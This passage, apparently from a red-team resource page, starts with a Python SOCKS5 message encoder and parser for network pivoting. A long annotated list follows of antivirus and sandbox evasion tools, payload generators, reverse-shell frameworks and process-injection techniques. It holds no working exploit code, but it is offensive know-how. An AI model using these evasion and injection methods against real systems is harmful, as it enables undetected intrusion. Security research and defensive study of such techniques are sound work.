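METHOD_NO_AUTH, METHOD_NONE_ACCEPTABLE = 0x00, 0xFF
CMD_CONNECT, CMD_BIND, CMD_UDP = 0x01, 0x02, 0x03
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04
REPLY_TEXT = {
    0x00: "succeeded", 0x01: "general SOCKS server failure",
    0x02: "connection not allowed by ruleset", 0x03: "network unreachable",
    0x04: "host unreachable", 0x05: "connection refused", 0x06: "TTL expired",
    0x07: "command not supported", 0x08: "address type not supported",
}


def _encode_addr(host: str) -> bytes:
    """ATYP + address bytes for an IPv4 literal, IPv6 literal or hostname."""
    for family, atyp in ((socket.AF_INET, ATYP_IPV4), (socket.AF_INET6, ATYP_IPV6)):
        try:
            return bytes([atyp]) + socket.inet_pton(family, host)
        except OSError:
            pass  # not a literal of this family; try the next encoding
    name = host.encode("idna")
    if not 1 <= len(name) <= 255:  # one length octet precedes the name
        raise ValueError("domain name length must be 1..255")
    return bytes([ATYP_DOMAIN, len(name)]) + name


def _decode_addr(data: bytes, off: int):
    """Parse ATYP + address at offset; return (host, offset after it)."""
    atyp = data[off]
    if atyp == ATYP_IPV4:
        return socket.inet_ntop(socket.AF_INET, data[off + 1:off + 5]), off + 5
    if atyp == ATYP_IPV6:
        return socket.inet_ntop(socket.AF_INET6, data[off + 1:off + 17]), off + 17
    if atyp == ATYP_DOMAIN:
        n = data[off + 1]
        return data[off + 2:off + 2 + n].decode("idna"), off + 2 + n
    raise ValueError(f"unknown address type {atyp:#x}")


# --- client side -----------------------------------------------------------
def build_greeting(methods=(METHOD_NO_AUTH,)) -> bytes:
    """VER | NMETHODS | METHODS..."""
    return bytes([VER, len(methods), *methods])


def parse_method_selection(data: bytes) -> int:
    """VER | METHOD chosen by the server; 0xFF means no common method."""
    if len(data) != 2 or data[0] != VER:
        raise ValueError("malformed method selection")
    if data[1] == METHOD_NONE_ACCEPTABLE:
        raise ValueError("server accepted none of the offered methods")
    return data[1]


def build_request(host: str, port: int, cmd: int = CMD_CONNECT) -> bytes:
    """VER | CMD | RSV | ATYP | DST.ADDR | DST.PORT (network byte order)."""
    return bytes([VER, cmd, 0x00]) + _encode_addr(host) + struct.pack("!H", port)


def parse_reply(data: bytes):
    """VER | REP | RSV | ATYP | BND.ADDR | BND.PORT -> (rep, host, port)."""
    if len(data) < 4 or data[0] != VER:
        raise ValueError("malformed reply")
    host, off = _decode_addr(data, 3)
    (port,) = struct.unpack("!H", data[off:off + 2])
    return data[1], host, port


# --- server side -----------------------------------------------------------
def parse_greeting(data: bytes) -> list:
    if len(data) < 2 or data[0] != VER or len(data) != 2 + data[1]:
        raise ValueError("malformed greeting")
    return list(data[2:])


def select_method(offered, supported=(METHOD_NO_AUTH,)) -> bytes:
    chosen = next((m for m in supported if m in offered), METHOD_NONE_ACCEPTABLE)
    return bytes([VER, chosen])


def parse_request(data: bytes):
    """Return (cmd, target host, target port) from a client request."""
    if len(data) < 4 or data[0] != VER or data[2] != 0x00:
        raise ValueError("malformed request")
    host, off = _decode_addr(data, 3)
    (port,) = struct.unpack("!H", data[off:off + 2])
    return data[1], host, port


def build_reply(rep: int, bind_host: str = "0.0.0.0", bind_port: int = 0) -> bytes:
    return bytes([VER, rep, 0x00]) + _encode_addr(bind_host) + struct.pack("!H", bind_port)


def demo_exchange(target="internal.corp.example", port=3389):
    """Walk a full CONNECT exchange in memory; return what each side parsed."""
    offered = parse_greeting(build_greeting())
    method = parse_method_selection(select_method(offered))
    cmd, host, p = parse_request(build_request(target, port))
    rep, bound_host, bound_port = parse_reply(build_reply(0x00, "10.0.0.1", 40000))
    return method, (cmd, host, p), (bound_host, bound_port)


if __name__ == "__main__":
    print(demo_exchange())
    print(REPLY_TEXT[parse_reply(build_reply(0x05))[0]])
```

Sending the target as a domain name (ATYP 0x03) rather than resolving it locally is what makes DNS resolution happen on the far side of the pivot; a tool that resolves first and sends ATYP 0x01 leaks the lookup from the operator's network, which is the difference between SOCKS4 and SOCKS4a that several tools above mention.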
- WMI
- PowerLurk
  - PowerLurk is a PowerShell toolset for building malicious WMI Event Subscriptions. The goal is to make WMI events easier to fire off during a penetration test or red team engagement.
  - Creeping on Users with WMI Events: Introducing PowerLurk
- VNC
- Invoke-Vnc
  - Invoke-Vnc executes a VNC agent in-memory and initiates a reverse connection, or binds to a specified port. Password authentication is supported.
- jsmpeg-vnc
  - A low latency, high framerate screen sharing server for Windows and client for browsers
- Socat
- Articles/Writeups
Avoiding/Bypassing AV(Anti-Virus)/UAC/Whitelisting/Sandboxes/Logging/etc - General Evasion Tactics & Techniques
- 101
- Educational
- Learn how to hide your trojans, backdoors, etc from anti virus.
- Easy Ways To Bypass Anti-Virus Systems - Attila Marosi -Trooper14
- Muts Bypassing AV in Vista/Pissing all over your AV
  - presentation, listed here as it was a bitch finding a live copy
- How to Bypass Anti-Virus to Run Mimikatz - Spoiler, AV still sucks, changing strings is helpful
-
- The goal of this repo is to study the Windows penetration techniques.
- Art of Anti Detection 1 – Introduction to AV & Detection Techniques - Ege Balci
- Art of Anti Detection 2 – PE Backdoor Manufacturing - Ege Balci
- Breaking Antivirus Software - Joxean Koret, COSEINC(SYSCAN2014)
-
- While security products are a great supplement to the defensive posture of an enterprise, to well-funded nation-state actors, they are an impediment to achieving their objectives. As pentesters argue the efficacy of a product because it doesn't detect their specific offensive technique, mature actors recognize a need to holistically subvert the product at every step during the course their operation.
  - Whitepaper
  - Slides
  - Code
- Articles/Blogposts/Writeups
- Unsorted:
- Learn how to hide your trojans, backdoors, etc from anti virus.
- [Virus] Self-modifying code-short overview for beginners(2010)
- AVLeak: Fingerprinting Antivirus Emulators Through Black-Box Testing - Jeremy Blackthorne, Alexei Bulazel, Andrew Fasano, Patrick Biernat, Bülent Yener(USENIX WOOT2016)
- Facts and myths about antivirus evasion with Metasploit - mihi - 2011
  - This article tries to give an overview of the current executable generation scheme of Metasploit, how AV detects them, and how to evade them. Note that this document only covers standalone EXE files (for Windows) that replace an EXE template's functionality, and not other payloads for exploits, service executables (like for the windows/psexec exploit) or executables that merely add to the original template's functionality (like the -k option of msfpayload).
- Easy Ways To Bypass Anti-Virus Systems - Attila Marosi(DeepSec 2013)
- Custom Meterpreter loader DLL - Asr0baby(2014)
- Three Simple Disguises for Evading Antivirus - Logan Lembke(2016)
- Meterpreter stage AV/IDS evasion with powershell - arno0x0x(2016)
- Escaping The Avast Sandbox Using A Single IOCTL - Kyriakos Economou(2016)
- How to Bypass Anti-Virus to Run Mimikatz - Carrie Roberts(2017)
- How to Accidently Win Against AV - RastaMouse(2017)
- Executing Meterpreter in Memory on Windows 10 and Bypassing AntiVirus - n00py(2018)
- Antivirus Evasion for Penetration Testing Engagements - Nathu Nandwani(2018)
- Bypassing Detection for a Reverse Meterpreter Shell - Mohit Suyal(2018)
- Simple AV Evasion Symantec and P4wnP1 USB - Frans Hendrik Botes(2019)
- Distribution of malicious JAR appended to MSI files signed by third parties - Bernardo.Quintero(2019)
- On code isolation in Python - Artem Golubin(2020)
- Talks & Presentations
- Adventures in Asymmetric Warfare - Will Schroeder(BSides Augusta2014)
  - As a co-founder and principal developer of the Veil-Framework, the speaker has spent a considerable amount of time over the past year and a half researching AV-evasion techniques. This talk will briefly cover the problem space of antivirus detection, as well as the reaction to the initial release of Veil-Evasion, a tool for generating AV-evading executables that implements much of the speaker’s research. We will trace through the evolution of the obfuscation techniques utilized by Veil-Evasion’s generation methods, culminating in the release of an entirely new payload language class, as well as the release of a new .NET encryptor. The talk will conclude with some basic static analysis of several Veil-Evasion payload families, showing once and for all that antivirus static signature detection is dead.
- 101
- Sandboxes from a pen tester’s view - Rahul Kashyap
  - In this talk we’ll do an architectural decomposition of application sandboxing technology from a security perspective. We look at various popular sandboxes such as Google Chrome, Adobe ReaderX, Sandboxie amongst others and discuss the limitations of each technology and its implementation. Further, we discuss in depth with live exploits how to break out of each category of sandbox by leveraging various kernel and user mode exploits – something that future malware could leverage. Some of these exploit vectors have not been discussed widely and awareness is important.
- Adobe Sandbox
- chroot
- Breaking out of Contained Linux Shells
- Python Sandbox
- Escaping a Python sandbox with a memory corruption bug
- Breaking out of secured Python environments
- Sandboxed Execution Environment
  - Documentation
  - Sandboxed Execution Environment (SEE) is a framework for building test automation in secured environments. The sandboxes, provided via libvirt, are customizable, allowing a high degree of flexibility. Different types of hypervisors (Qemu, VirtualBox, LXC) can be employed to run the test environments.
- Usermode Sandboxing
- ssh
- Windows
- Windows Desktop Breakout
- Kiosk/POS Breakout Keys in Windows - TrustedSec
- menu2eng.txt - How To Break Out of Restricted Shells and Menus, v2.3(1999)
  - An excellent whitepaper detailing methods for breaking out of virtually any kind of restricted shell or menu you might come across.
- Kiosk Escapes Pt 2 - Ft. Microsoft Edge!! - H4cklife
  - TL/DR: Microsoft Edge brings up Windows Explorer when you navigate to C:\ in the URL; Win+x can be used to access the start menu when shortcut keys are limited
- Breaking Typical Windows Hardening Implementations - Oddvar Moe(2020)
- VDI
- VirtualMachine
- Exploiting the Hyper-V IDE Emulator to Escape the Virtual Machine - Joe Bialek
- L1TF (Foreshadow) VM guest to host memory read PoC
  - This is a PoC for CVE-2018-3646. This is a vulnerability that enables malicious/compromised VM guests to read host machine physical memory. The vulnerability is exploitable on most Intel CPUs that support VT-x and EPT (extended page tables). This includes all Intel Core iX CPUs. This PoC works only on 64 bit x86-64 systems (host and guest).
Payloads & Shells
- 101
- Payloads
- Staged vs Stageless Handlers - OJ Reeves
- Toying with inheritance - hexacorn
- Proxy-Aware Payload Testing - redxorblue
  - "I get told that I am too wordy, so if you want the summary, here are some steps to setup a virtual testing environment to test payloads to see if they can handle HTTP(S) proxies and if so, can they authenticate properly through them as well. This post will cover the proxy setup without authentication since that is the easier part, and I will do a second post shortly to hack together the authentication portion of it."
- Handling Shells
- Alveare
  - Multi-client, multi-threaded reverse shell handler written in Node.js. Alveare (hive in Italian) lets you listen for incoming reverse connections, list them, handle and bind the sockets. It's an easy to use tool, useful to handle reverse shells and remote processes.
- Tools to help generate payloads
-
- A quick way to generate various "basic" Meterpreter payloads via msfvenom (part of the Metasploit framework).
-
- Magic Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
-
- SharpShooter is a payload creation framework for the retrieval and execution of arbitrary CSharp source code. SharpShooter is capable of creating payloads in a variety of formats, including HTA, JS, VBS and WSF. It leverages James Forshaw's DotNetToJavaScript tool to invoke methods from the SharpShooter DotNet serialised object. Payloads can be retrieved using Web or DNS delivery or both; SharpShooter is compatible with the MDSec ActiveBreach PowerDNS project. Alternatively, stageless payloads with embedded shellcode execution can also be generated for the same scripting formats.
-
- Gscript is a framework for building multi-tenant executors for several implants in a stager. The engine works by embedding runtime logic (powered by the V8 Javascript Virtual Machine) for each persistence technique. This logic gets run at deploy time on the victim machine, in parallel for every implant contained with the stager. The Gscript engine leverages the multi-platform support of Golang to produce final stage one binaries for Windows, Mac, and Linux.
- Techniques
- Crypters
- Keying
- Articles
- Talks/Presentations/Videos
- Context-Keyed Payload Encoding: Fighting The Next Generation of IDS - Dimitris Glynos(AthCon2010)
  - Slides
  - Paper
  - Exploit payload encoding allows hiding malicious payloads from modern Intrusion Detection Systems (IDS). Although metamorphic and polymorphic encoding allow such payloads to be hidden from signature-based and anomaly-based IDS, these techniques fall short when the payload is being examined by IDS that can trace the execution of malicious code. Context-keyed encoding is a technique that allows the attacker to encrypt the malicious payload in such a way that it can only be executed in an environment (context) with specific characteristics. By selecting an environment characteristic that will not be present during the IDS trace (but will be present on the target host), the attacker may evade detection by advanced IDS. This paper focuses on the current research in context-keyed payload encoding and proposes a novel encoder that surpasses many of the limitations found in its predecessors.
- Advanced Payload Strategies: “What is new, what works and what is hoax?”
  - This talk focuses on the shellcode perspective and its evolution. From the simplest {shell}code to the polymorphism to bypass filters and I{D|P}S (which has lots of new ideas, like application-specific decoders, decoders based on architecture-instructions, and many others), passing through syscall proxying and injection, this talk will explain how it works and how effective they are against the new evolving technologies like network code emulation, with live demonstrations. It has been a long time since the first paper was released about shellcoding. Most modern texts just try to explain the assembly structure, and many new ideas have just been released as code, never detailed or explained. The talk will try to fix this gap, also showing some new ideas and considering different architectures.
- Genetic Malware: Designing Payloads for Specific Targets - Travis Morrow, Josh Pitts(2016)
- Protect Your Payloads Modern Keying Techniques - Leo Loobeek(Derbycon2018)
  - Our payloads are at risk! Incident responders, threat hunters, and automated software solutions are eager to pick apart your new custom dropper and send you back to square one. One answer to this problem is encrypting your payload with key derivation functions ("keying") which leverages a variety of local and remote resources to build the decryption key. Throughout this talk I will present modern keying techniques and demo some tools to help along the way. I will start with showing how easy it is to discover attacker infrastructure or techniques in the payloads we commonly use every day. I will then quickly review how keying helps and the considerations when generating keyed payloads. Throughout the presentation many practical examples of keying techniques will be provided which can be used for typical pentests or full red team operations. Finally I will introduce KeyServer, a new piece to add to your red team infrastructure which handles advanced HTTP and DNS keying. Using unprotected payloads during ops should be a thing of the past. Let’s regain control of our malicious code and make it harder on defenders! This talk is based on the original research of environmental keying by Josh Pitts and Travis Morrow.
Papers
- Environmental Key Generation towards Clueless Agents - J. Riordan and B. Schneier(1998)
    - In this paper, we introduce a collection of cryptographic key constructions built from environmental data that are resistant to adversarial analysis and deceit. We expound upon their properties and discuss some possible applications; the primary envisioned use of these constructions is in the creation of mobile agents whose analysis does not reveal their exact purpose.
- Strong Cryptography Armoured Computer Viruses Forbidding Code Analysis: the bradley virus - Eric Filiol(2004)
    - Imagining what the nature of future viral attacks might look like is the key to successfully protecting against them. This paper discusses how cryptography and key management techniques may definitively checkmate antiviral analysis and mechanisms. We present a generic virus, denoted bradley, which protects its code with a very secure, ultra-fast symmetric encryption. Since the main drawback of using encryption in that case lies in the existence of the secret key or information about it within the viral code, we show how to bypass this limitation by using suitable key management techniques. Finally, we show that the complexity of the bradley code analysis is at least as high as that of the cryptanalysis of its underlying encryption algorithm.
- Foundations and applications for secure triggers - Ariel Futoransky, Emiliano Kargieman, Carlos Sarraute, Ariel Waissbein(2006)
    - Imagine there is certain content we want to maintain private until some particular event occurs, when we want to have it automatically disclosed. Suppose, furthermore, that we want this done in a (possibly) malicious host. Say the confidential content is a piece of code belonging to a computer program that should remain ciphered and then "be triggered" (i.e., deciphered and executed) when the underlying system satisfies a preselected condition, which must remain secret after code inspection. In this work we present different solutions for problems of this sort, using different "declassification" criteria, based on a primitive we call secure triggers. We establish the notion of secure triggers in the universally composable security framework of Canetti [2001] and introduce several examples. Our examples demonstrate that a new sort of obfuscation is possible. Finally, we motivate its use with applications in realistic scenarios.
- Context-keyed Payload Encoding: Preventing Payload Disclosure via Context - druid@caughq.org(2008)
- Malicious cryptography... reloaded - Eric Filiol, Frédéric Raynal(CanSecWest2008)
- Context-keyed Payload Encoding: Fighting the Next Generation of IDS - Dimitrios A. Glynos(2010)
- Impeding Automated Malware Analysis with Environment-sensitive Malware - Chengyu Song, Paul Royal, Wenke Lee(2012)
    - To solve the scalability problem introduced by the exponential growth of malware, numerous automated malware analysis techniques have been developed. Unfortunately, all of these approaches make previously unaddressed assumptions that manifest as weaknesses to the tenability of the automated malware analysis process. To highlight this concern, we developed two obfuscation techniques that make the successful execution of a malware sample dependent on the unique properties of the original host it infects. To reinforce the potential for malware authors to leverage this type of analysis resistance, we discuss the Flashback botnet's use of a similar technique to prevent the automated analysis of its samples.
- Sleeping Your Way out of the Sandbox - Hassan Mourad(2015)
    - In recent years, the security landscape has witnessed the rise of a new breed of malware, Advanced Persistent Threat, or APT for short. With all traditional security solutions failing to address this new threat, a demand was created for new solutions that are capable of addressing the advanced capabilities of APT. One of the offered solutions was file-based sandboxes, a solution that dynamically analyzes files and judges their threat levels based on their behavior in an emulated/virtual environment. But security is a cat and mouse game, and malware authors are always trying to detect/bypass such measures. Some of the common techniques used by malware for sandbox evasion will be discussed in this paper. This paper will also analyze how to turn some countermeasures used by sandboxes against it. Finally, it will introduce some new ideas for sandbox evasion along with recommendations to address them.
- Hot Knives Through Butter: Evading File-based Sandboxes - Abhishek Singh, Zheng Bu(2014)
Tools
Metasploit
- Hostname-based Context Keyed Payload Encoder - Metasploit Module
    - 'Context-Keyed Payload Encoder based on hostname and x64 XOR encoder.'
- EBOWLA
    - Framework for Making Environmental Keyed Payloads
- keyring
    - KeyRing was written to make key derivation functions (keying) more approachable and easier to quickly develop during pentesting and red team operations. Keying is the idea of encrypting your original payload with local and remote resources, so it will only decrypt on the target system or under other situations.
- satellite
    - Satellite: A Payload and Proxy Service for Red Team Operations - Max Harley
    - Satellite is a web payload hosting service which filters requests to ensure the correct target is getting a payload. This can also be a useful service for hosting files that should only be accessed in very specific circumstances.
- GoGreen
    - This project was created to bring environmental (and HTTP) keying to scripting languages. As it is commonplace to use PowerShell/JScript/VBScript as an initial vector of code execution, as a result of phishing or lateral movement, I see value in these techniques for these languages.
- Spotter
    - Spotter is a tool to wrap payloads in environmentally-keyed, AES256-encrypted launchers. These keyed launchers provide a way to ensure your payload is running on its intended target, as well as provide a level of protection for the launcher itself.
- Polyglot
(Ex)/(S)ample Payloads and supporting tools written in various languages
C & C++
- Undetectable C# & C++ Reverse Shells - Bank Security
    - Technical overview of different ways to spawn a reverse shell on a victim machine
C#
- EasyNet
    - Packs/unpacks arbitrary data using a simple Data -> Gzip -> AES -> Base64 algorithm. Generates a random AES-256 key and IV and provides them to the user. Can be used to pack or unpack arbitrary data. Provided both as a program and a library.
- Inception Framework
    - Inception provides in-memory compilation and reflective loading of C# apps for AV evasion. Payloads are AES encrypted before transmission and are decrypted in memory. The payload server ensures that payloads can only be fetched a pre-determined number of times. Once decrypted, Roslyn is used to build the C# payload in memory, which is then executed using reflection.
Go
- Go-deliver
    - Go-deliver is a payload delivery tool coded in Go. This is the first version and other features will be added in the future.
- Hershell
    - Simple TCP reverse shell written in Go. It uses TLS to secure the communications, and provides a certificate public key fingerprint pinning feature, preventing traffic interception.
    - [EN] Golang for pentests : Hershell
HTA
- genHTA
    - Generates anti-sandbox analysis HTA files without payloads
- morpHTA
    - Morphing Cobalt Strike's evil.HTA
- Demiguise
    - The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page, the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place, and (if you use environmental keying) to avoid it being sandboxed.
LNK Files
- LNKUp
    - Generates malicious LNK file payloads for data exfiltration
    - Embedding reverse shell in .lnk file or Old horse attacks
MSI Binaries
- Wix Toolkit
    - Tool for crafting MSI binaries
    - Distribution of malicious JAR appended to MSI files signed by third parties
.NET
- DotNetToJScript
    - A tool to create a JScript file which loads a .NET v2 assembly from memory.
    - Payload Generation with CACTUSTORCH
Powershell
- Powershell Download Cradles - Matthew Green
- Invoke-PSImage
    - Invoke-PSImage takes a PowerShell script and embeds the bytes of the script into the pixels of a PNG image. It generates a oneliner for executing either from a file or from the web (when the -Web flag is passed). The least significant 4 bits of 2 color values in each pixel are used to hold the payload. Image quality will suffer as a result, but it still looks decent. The image is saved as a PNG, and can be losslessly compressed without affecting the ability to execute the payload as the data is stored in the colors themselves. It can accept most image types as input, but output will always be a PNG because it needs to be lossless. Each pixel of the image is used to hold one byte of script, so you will need an image with at least as many pixels as bytes in your script. This is fairly easy; for example, Invoke-Mimikatz fits into a 1920x1200 image.
- Reverse Encrypted (AES 256-bit) Shell over TCP - using PowerShell SecureString.
- PowerDNS
    - PowerDNS is a simple proof of concept to demonstrate the execution of PowerShell script using DNS only. PowerDNS works by splitting the PowerShell script into chunks and serving it to the user via DNS TXT records.
Python
- Pupy
    - Pupy is a remote administration tool with an embedded Python interpreter, allowing its modules to load Python packages from memory and transparently access remote Python objects. The payload is a reflective DLL and leaves no trace on disk.
- Winpayloads
    - Undetectable Windows Payload Generation with extras, running on Python 2.7
- Cloak
    - Cloak generates a Python payload via msfvenom and then intelligently injects it into the Python script you specify.
SCT Files
- SCT-obfuscator
    - SCT payload obfuscator. Renames variables and changes hardcoded char values to random ones.
VBA
- VBad
    - VBad is a fully customizable VBA obfuscation tool combined with an MS Office document generator. It aims to help Red & Blue teams for attack or defense.
Anti-Virus
Articles/Writeups
- pecloak.py - An Experiment in AV evasion
- How to Bypass Anti-Virus to Run Mimikatz
- Practical Anti-virus Evasion - Daniel Sauder
- Why Anti-Virus Software Fails
- Sacred Cash Cow Tipping 2017 - BlackHills Infosec
    - We're going to bypass most of the major antivirus programs. Why? 1) Because it's fun. 2) Because it'll highlight some of the inherent weaknesses in our environments today.
- Sacred Cash Cow Tipping 2020 - BHIS
- Deep Dive Into Stageless Meterpreter Payloads
- Execute ShellCode Using Python
    - In this article I am going to show you how we can use Python and its "ctypes" library to execute a "calc.exe" shellcode or any other shellcode.
- Executing Meterpreter in Memory on Windows 10 and Bypassing AntiVirus - noopy.io
- Executing Meterpreter in Memory on Windows 10 and Bypassing AntiVirus (Part 2) - noopy.io
- Bypassing Kaspersky 2017 AV by XOR encoding known malware with a twist - monoc.com
- Bypassing Static Antivirus With Ten Lines of Code - Attactics
Tools
- avepoc
    - Some PoCs for antivirus evasion
- AVSignSeek
    - Tool written in Python 3 to determine where the AV signature is located in a binary/payload
- SpookFlare: Stay In Shadows
- avet framework
    - AVET is an AntiVirus Evasion Tool, which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. In version 1.1 a lot of stuff was introduced; for a complete overview have a look at the CHANGELOG file. Now 64-bit payloads can also be used; for easier usage I hacked a small build tool (avet_fabric.py).
- Don't Kill My Cat (DKMC)
    - Don't Kill My Cat is a tool that generates obfuscated shellcode that is stored inside of polyglot images. The image is 100% valid and also 100% valid shellcode. The idea is to avoid sandbox analysis since it's a simple "legit" image. For now the tool relies on PowerShell to execute the final shellcode payload.
    - Presentation - Northsec2017
- Dr0p1t-Framework
    - Have you ever heard about trojan droppers? In short, a dropper is a type of trojan that downloads other malware, and Dr0p1t gives you the chance to create a stealthy dropper that bypasses most AVs and has a lot of tricks ( Trust me :D ) ;)
- PowerLine
- Invoke-CradleCrafter: Moar PowerShell obFUsk8tion by Daniel Bohannon
- Invoke-CradleCrafter v1.1
- wePWNise
    - WePWNise generates architecture independent VBA code to be used in Office documents or templates and automates bypassing application control and exploit mitigation software
- katz.xml
    - Downloads Mimikatz From GitHub, Executes Inside of MsBuild.exe
- Shellter
- SigThief
    - Stealing Signatures and Making One Invalid Signature at a Time
- SideStep
    - SideStep is yet another tool to bypass anti-virus software. The tool generates Metasploit payloads encrypted using the CryptoPP library (license included), and uses several other techniques to evade AV.
- peCloak.py - An Experiment in AV Evasion
- Making FinFisher Undetectable
- Bypass AV through several basic/effective techniques
- stupid_malware
    - Python malware for pentesters that bypasses most antivirus (signature and heuristics) and IPS using sheer stupidity
- InfectPE
    - Using this tool you can inject x-code/shellcode into a PE file. InjectPE works only with 32-bit executable files.
- MorphAES
    - IDPS & SandBox & AntiVirus STEALTH KILLER. MorphAES is the world's first polymorphic shellcode engine, with metamorphic properties and capability to bypass sandboxes, which makes it undetectable for an IDPS; it's cross-platform as well and library-independent.
- Inception
    - Provides in-memory compilation and reflective loading of C# apps for AV evasion.
- recomposer
    - Randomly changes Win32/64 PE files for 'safer' uploading to malware and sandbox sites.
- Phantom-Evasion
    - Phantom-Evasion is an interactive antivirus evasion tool written in Python capable of generating (almost) FUD executables even with the most common 32-bit msfvenom payloads (lower detection ratio with 64-bit payloads). The aim of this tool is to make antivirus evasion an easy task for pentesters through the use of modules focused on polymorphic code and antivirus sandbox detection techniques. Since version 1.0 Phantom-Evasion also includes a post-exploitation section dedicated to persistence and auxiliary modules.
Stuff
- I swear I'll get around to this soon™, and make it actually useful/document things
Agnostic
- Library Injection
Linux
- 101
- Articles/Blogposts/Writeups
- Talks & Presentations
Tools
- Jugaad - Thread Injection Kit
    - Jugaad is an attempt to create a CreateRemoteThread() equivalent for the *nix platform. The current version supports only the Linux operating system. For details on the methodology behind jugaad and how things work under the hood, visit http://null.co.in/section/projects for a detailed paper.
- linux-injector
    - Utility for injecting executable code into a running process on x86/x64 Linux. It uses ptrace() to attach to a process, then mmap()'s memory regions for the injected code, a new stack, and space for trampoline shellcode. Finally, the trampoline in the target process is used to create a new thread and execute the chosen shellcode, so the main thread is allowed to continue. This project borrows from a number of other projects and research, see References below.
- linux-inject
    - Tool for injecting a shared object into a Linux process
- injectso64
    - This is the x86-64 rewrite of Shaun Clowes' i386/SPARC injectso which he presented at Blackhat Europe 2001.
OS X
- 101
- Articles/Blogposts/Writeups
- Talks & Presentations
- Tools
Python
- 101
- Articles/Blogposts/Writeups
- Talks & Presentations
Tools
- pyrasite
    - Tools for injecting arbitrary code into running Python processes.
- Equip: python bytecode instrumentation
    - equip is a small library that helps with Python bytecode instrumentation. Its API is designed to be small and flexible to enable a wide range of possible instrumentations. The instrumentation is designed around the injection of bytecode inside the bytecode of the program to be instrumented. However, the developer does not need to know anything about the Python bytecode since the injected code is Python source.
Windows
Tools
- InfectPE
    - Using this tool you can inject x-code/shellcode into a PE file. InjectPE works only with 32-bit executable files.
- Inception Framework
    - Inception provides in-memory compilation and reflective loading of C# apps for AV evasion. Payloads are AES encrypted before transmission and are decrypted in memory. The payload server ensures that payloads can only be fetched a pre-determined number of times. Once decrypted, Roslyn is used to build the C# payload in memory, which is then executed using reflection.
Linux Code Injection
- 101
- General Information
- Articles/Blogposts/Writeups
- Techniques
macOS Code Injection
- 101
- General Information
- Articles/Blogposts/Writeups
- Techniques
Windows Code Injection Techniques
- 101
- 3 Base Primitive Categories
    - Process Spawning Techniques
    - Injecting During Process Initialization
    - Injecting into Running Processes
    - One day I'll sort the articles/techniques into each.
Articles/Blogposts/Writeups that aren't about one specific technique
- Windows API index - docs.ms
    - The following is a list of the reference content for the Windows application programming interface (API) for desktop and server applications.
- Ten process injection techniques: A technical survey of common and trending process injection techniques - Ashkan Hosseini(2017)
- Memory Injection like a Boss - Noora Hyvärinen(2018)
- Process Injection - Part I - 3xpl01tc0d3r(2019)
- The state of advanced code injections - David Korczynski(2019)
- Process Injection: a primer - RedCanary(2020)
    - Experts from Red Canary, VMware Carbon Black, MITRE ATT&CK, and Microsoft break down the many facets of the Process Injection technique.
- Hidden in plain sight? - @casheeew(BlackHoodie2018)
- PoC Examples
Generic
- GetEnvironmentVariable as an alternative to WriteProcessMemory in process injections - x-c3ll(2020)
- Injecting Code into Windows Protected Processes using COM - Part 1 - James Forshaw(P0)
- Injecting Code into Windows Protected Processes using COM - Part 2 - James Forshaw(P0)
PoCs
- demos - hasherezade
- Injectopi
    - Injectopi is a set of tutorials that I've decided to write down in order to learn about various injection techniques in the Windows environment.
- InjectProc - Process Injection Techniques
- pinjectra
- CreateRemoteThread
APC
101
- Asynchronous Procedure Calls - docs.ms
- Inside NT's Asynchronous Procedure Call - Albert Almeida(2002)
- Remote Windows Kernel Exploitation Step into the Ring 0 - Barnaby Jack
- Windows Process Injection: Asynchronous Procedure Call (APC) - modexp(2019)
- APC Series: User APC API - Ori Damari(2020)
- APC Series: User APC Internals - Ori Damari(2020)
Informational
- Kernel to User land: APC injection - Vault7Leaks
- Examining the user-mode APC injection sensor introduced in Windows 10 build 1809 - Souhail Hammou
- Bypassing the Microsoft-Windows-Threat-Intelligence Kernel APC Injection Sensor - Philip Tsukerman(2019)
- The Curious Case of QueueUserAPC - Dwight Hohnstein(2019)
- Process Injection - Part V - 3xpl01tc0d3r(2019)
- Userland-Specific
- Kernel-Specific
- Performing
Tools
- PoC
- Inject-dll-by-APC
- APC Internals Research Code
- injdrv
    - injdrv is a proof-of-concept Windows driver for injecting a DLL into user-mode processes using APC.
- APCInjector
    - Windows kernel-driver DLL injector using APC
- APC-PPID
    - Adds a user-mode asynchronous procedure call (APC) object to the APC queue of the specified thread and spoofs the parent process.
Atom Bombing
101
- AtomBombing – A New Code Injection Attack - ENISA(2016)
- AtomBombing: Injecting Code Using Windows' Atoms - Tal Liberman(BSidesSF2017)
    - In this talk we present a code injection technique, dubbed AtomBombing, which exploits Windows atom tables and Async Procedure Calls (APC). At the time of its release (October 2016), AtomBombing went undetected by common security solutions that focused on preventing infiltration. AtomBombing affects all Windows versions. In particular, we tested it against Windows 10 and Windows 7. Unfortunately, this issue cannot be patched by Microsoft since it doesn't rely on broken or flawed code – rather on how these operating system mechanisms are designed.
Info
- Dridex’s Cold War: Enter AtomBombing - Magal Baz, Or Safran(2017)
- Detecting stealthier cross-process injection techniques with Windows Defender ATP: Process hollowing and atom bombing - MS(2017)
- AtomBombing Evasion and Detection
- Dridex’s Bag of Tricks: An Analysis of its Masquerading and Code Injection Techniques - Ratnesh Pandey(2019)
- Performing
- PoC
- Breaking BaDDEr
- 'Code-less' Injection
- Command Line and Environment Variables
- Console Window Class
- Ctrl Injection
DLL Injection
101
- Dynamic-link library
- DllMain entry point - docs.ms
- Exporting from a DLL - docs.ms
- DLL injection - Wikipedia
- A More Complete DLL Injection Solution Using CreateRemoteThread - Drew_Benton(2007)
- DLL Injection and WoW64 - corsix(2010)
- Windows DLL Injection Basics - Brad Antoniewicz(2013)
- DLL/PIC Injection on Windows from Wow64 process - modexp(2015)
Articles/Blogposts/Writeups
Informational
- Remote Thread Execution in System Process using NtCreateThreadEx for Vista & Windows7 - securityxploded
- DLL Injection and Windows 8 - nagareshwar.securityxploded(2012)
- Using SetWindowsHookEx for DLL Injection on Windows - Dejan Lukan(2013)
- MapViewOfFile or NtMapViewOfSection?
